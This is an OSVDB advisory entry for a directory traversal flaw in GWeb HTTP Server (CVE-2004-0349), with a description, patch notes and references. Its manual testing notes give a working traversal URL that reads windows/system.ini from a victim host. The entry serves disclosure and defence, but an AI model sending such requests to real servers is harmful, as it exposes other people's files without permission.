GWeb HTTP Server Arbitrary File Access

2004-03-04T07:11:54
ID OSVDB:4136
Type osvdb
Reporter Donato Ferrante(fdonato@autistici.org)
Modified 2004-03-04T07:11:54

Description

Vulnerability Description

GWeb HTTP Server contains a flaw that allows a remote attacker to navigate outside of the web path. The issue is due to GWeb not properly sanitizing user input, specifically traversal style attacks (../../). An attacker is able to see and download all the files on the remote system simply using a browser.

Solution Description

There is no known vendor supplied patch. Donato Ferrante has released a patch with the original advisory. Please see external reference 'Other Advisory URL' for more information.

Short Description

GWeb HTTP Server contains a flaw that allows a remote attacker to navigate outside of the web path. The issue is due to GWeb not properly sanitizing user input, specifically traversal style attacks (../../). An attacker is able to see and download all the files on the remote system simply using a browser.

Manual Testing Notes

http://[victim]/../../../../../../windows/system.ini

References:

Secunia Advisory ID:11041 Other Advisory URL: http://www.autistici.org/fdonato/advisory/GWebHTTPServer0.6-adv.txt Keyword: Directory Traversal ISS X-Force ID: 15381 CVE-2004-0349 Bugtraq ID: 9742